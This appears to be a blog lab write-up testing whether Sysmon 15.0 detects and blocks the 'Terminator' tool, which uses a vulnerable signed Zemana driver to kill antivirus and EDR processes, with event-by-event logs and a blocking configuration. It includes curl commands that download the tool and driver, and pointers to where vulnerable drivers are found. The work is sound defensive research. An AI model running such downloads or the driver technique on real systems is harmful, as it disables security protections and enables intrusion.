Sysmon 15.0 VS Spyboy Terminator

8 min readJul 25, 2023

About Terminator

On May 21 2023, a Forum user named Spyboy posted on a Russian forum for selling Tools named “Terminator” that can bypass 23 EDR and AV controls. Spyboy is pricing the software from $300 USD (single bypass) to $3,000 USD (all-in-one bypass).

Terminator software requires administrative privileges and User Account Controls (UAC) acceptance to properly function. When executed it will write a legitimate, signed driver file “Zemana Anti-Malware” to the C:\Windows\System32\drivers\ folder. In a normal situation, the driver was named zamguard64.sys or zam64.sys. After dropping Zemana’s driver Terminator will use it to disable security solutions.

This technique is called Bring Your Own Vulnerable Driver (BYOVD) attack technique the malware will drop the vulnerable driver to the victim’s machine and use vulnerabilities in the driver to execute malicious code with System Privilege.

The Zemana AntiMalware driver (zamguard64.sys) version < 3.2.28 and Zemana AntiLogger driver (zam64.sys) version < 2.74.204.664 affected by Incorrect Access Control vulnerability with 2 CVEs.

CVE-2023–36205: IOCTL allow a non-privileged user to open a handle to any privileged process.

2. CVE-2023–36204: IOCTL grants unrestricted disk read/write capabilities.

Noted: IOCTL is a DeviceIoControl function used by applications to communicate directly with a device driver.

About Sysmon 15.0

On Jun 27 2023, Microsoft Sysinternals released a new version of Sysmon. In this version Sysmon will set the service to run as a protected process (Protected Process Light), hardening it against tampering, and adds a new event, FileExecutableDetected (EventID 29), for when new executable images are saved to files.

Protected process light (PPL)

In Windows 8.1 and later version Windows have a concept of Protected Process Light (PPL), which enables specially-signed programs to run in such a way that they are immune from tampering and termination, even by administrative users. The gold to prevent malware from instantly Terminate Security Protections or injecting malicious code into processes.

We can use Process Hacker to check which process is Protected by PPL. In process properties, It is noted as “Protection: Light (Antimalware)”

It’s unable to Terminate this process even by utilizing Administrator Privilege.

Lab Environment Preparation

I decided to use Windows 10 Pro Version 21H2 OS build 19044.1889 as my testing environment and installed the following program.

Malwarebytes: The process named MBAMService.exe is protected by PPL. Before executing Terminator, I was setting an exclusion path to prevent it from being quarantined by Antimalware Scanner.

Sysmon version 15.0: The process named Sysmon.exe is protected by PPL. I was used Sysmonconfig from olafhartong (Reference: https://github.com/olafhartong/sysmon-modular) then changed the configuration for monitoring Terminator actions.
Event ID 5 Process Terminated: I changed it to monitor all programs in Drive C.

Event ID 29 File Executable Detected: I changed it to monitoring living off the land activities such as curl, FTP, etc.

Enable Microsoft Defender Antivirus: The process Antimalware Service Executable named MsMpEng.exe was protected by PPL.

Wireshark: The process named Wireshark.exe is not protected by PPL.

Splunk Universal Forwarder: The process named splunkd.exe is not protected by PPL.

Terminator Malware Preparation

Sadly, I can’t find the original version of Spyboy Terminator then I decided to use Reproduce version of Terminator created by ZeroMemoryEx.
I changed some code by removing Sysmon from the EDR killing list for monitoring the activities and then building it to an executable file.

For the vulnerable driver ZeroMemoryEx is already provided in this Github: https://github.com/ZeroMemoryEx/Terminator) or you can download it at LOLdrivers: https://www.loldrivers.io/. This website provides an updated list of vulnerable drivers.

Detection Terminator activities with Sysmon

Download Terminator.sys using Edge and Chrome

Event ID 29: FileExecutableDetected

This event is generated when Sysmon detects the creation of a new executable file (PE format).

The file was downloaded to “C:\Users\ewiges\Downloads\” by using Google Chrome and the MD5 is “21E13F2CB269DEFEAE5E1D09887D47BB”.

According to Virustotal, this file is Vulnerable driver Zemana.sys.

Event ID 15: FileCreateStreamHash

This event is aimed at capturing that based on the browser attaching a Zone.Identifier “mark of the web” stream.

If you download a file using a browser, some information in this event will be similar to EventID 29 that have Image, TargetFilename, and File’s Hash.

Event ID 15 FileCreateStreamHash: contains Hash

This EventID has another event that contains Zone Transfer information such as field HostUrl that displays the source URL: https://storage.googleapis.com/billy_herrington.

Event ID 15 FileCreateStreamHash: contains HostURL

Event ID 11: FileCreate

This event only records which process created the file and the filename, without displaying the Hash.

Download Terminator.exe and Terminator.sys using curl

Event ID 1: Process creation

If I download Terminator by using Curl. Sysmon will log the command that I executed from the Command line.

The Interesting fields are ParentImage, Image, and CommandLine.

Command to Download vulnerable driver:

curl https://storage.googleapis.com/billy_herrington/Terminator.sys -o Terminator.sys

Event ID 1 Process creation: Terminator.sys

Command to Download Terminator executable file:

curl https://storage.googleapis.com/billy_herrington/Terminator.exe -o Terminator.exe

Event ID 1 Process creation: Terminator.exe

Event ID 11: FileCreate

This event shows that User ewiges downloaded Terminator.sys and Terminator.exe to Desktop using curl.exe.

Event ID 29: FileExecutableDetected

This event’s information is similar to File Create, but it also includes the file hash.

Event ID 29 FileExecutableDetected: Terminator.exe

Terminator Execution

Event ID 1: Process creation

Terminator.exe was created by the Parent Process explorer.exe. This means that the user ran Terminator by himself.

Event ID 13: RegistryEvent (Value Set)

The Registry Event will occur after execution.

The “TargetObject” in this event is HKLM\System\CurrentControlSet\Services\Terminator\ImagePath.

The HKLM\SYSTEM\CurrentControlSet\Services registry tree stores information about each service on the system.
Each driver has a key of the form HKLM\SYSTEM\CurrentControlSet\Services\DriverName.

ImagePath is a value entry that specifies the fully qualified path of the driver’s image file.

The field “Details” described the value of Registry Key “C:\Users\ewiges\Desktop\Terminator.sys”.

This means Terminator application created Services named Terminator with the NT AUTHORITYSYSTEM privilege that has driver image file Terminator.sys.

Event ID 6: Driver loaded

The driver-loaded events provide information about a driver being loaded on the system.

In this event appears to be a legitimate driver Terminator.sys with a Signature from Zemana was loaded into the System.

This event also includes a Hash that can be used to determine whether the driver is vulnerable or malicious.

Event ID 6 Driver loaded: loaded Terminator.sys into System

Event ID 5: Process terminated

Finally, the Security Protection process will be terminated by Terminator, but the information in this event is insufficient to precisely identify that the Process was terminated by the Terminator application.

The process appears to have been terminated by the user who ran it such as MsMpEng.exe (Antimalware service executable) ran by System, Splunkd.exe (Splunk forwarder) ran by Service user named SplunkForwarder.

We need to correlate the previous Sysmon Event and this event to verify the Security protection process was terminated by Terminator.

Event ID 5 Process terminated: MsMpEng.exe (Antimalware service executable)

Event ID 5 Process terminated: MBAMService.exe (Malwarebytes)

Event ID 5 Process terminated: SecurityHeathService.exe (Windows Security Health Service)

Event ID 5 Process terminated: Wireshark.exe (Wireshark)

Event ID 5 Process terminated: splunkd.exe (Splunk Forwarder)

Prevention

If you use Sysmon, you can perform prevention by utilizing Event ID 27 FileBlockExecutable.

You can use the following Sysmon configuration.

Sysmon Event ID 27 configuration :
https://github.com/magicsword-io/LOLDrivers/blob/main/detections/sysmon/sysmon_config_vulnerable_hashes_block.xml

If you used another EDR, you can add the vulnerable drivers’ hash to prevent threat actors from using it.

Vulnerable drivers’ Hash : https://www.loldrivers.io/

Event ID 27: FileBlockExecutable

This event is generated when Sysmon detects and blocks the creation of executable files (PE format).

When this event occurs, the vulnerable driver is prevented from writing to disk and logging that which process tried to drop the file including Hash of Driver.

When this event occurs, the vulnerable driver is prevented from writing to disk. The log contains information on which process attempted to drop the file including the file’s hash.

Event ID 27 FileBlockExecutable: When it blocked Terminator.sys

This event can also prevent me from downloading another vulnerable driver.

Event ID 27 FileBlockExecutable: When it blocked vulnerable driver downloaded by chrome

After checking with Virus Total this vulnerable driver is Rtcore64.sys.

Virustotal detected driver as Rtcore64.sys

Conclusion

If the Terminator application is executed it can terminate all AV, EDR including Sysmon although the processes have PPL protection. But you can protect it by using EDR or Sysmon to block vulnerable drivers when writing into System.

Reference
https://www.reddit.com/r/crowdstrike/comments/13wjrgn/20230531_situational_awareness_spyboy_defense/
https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36
https://voidsec.com/reverse-engineering-terminator-aka-zemana-antimalware-antilogger-driver/
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon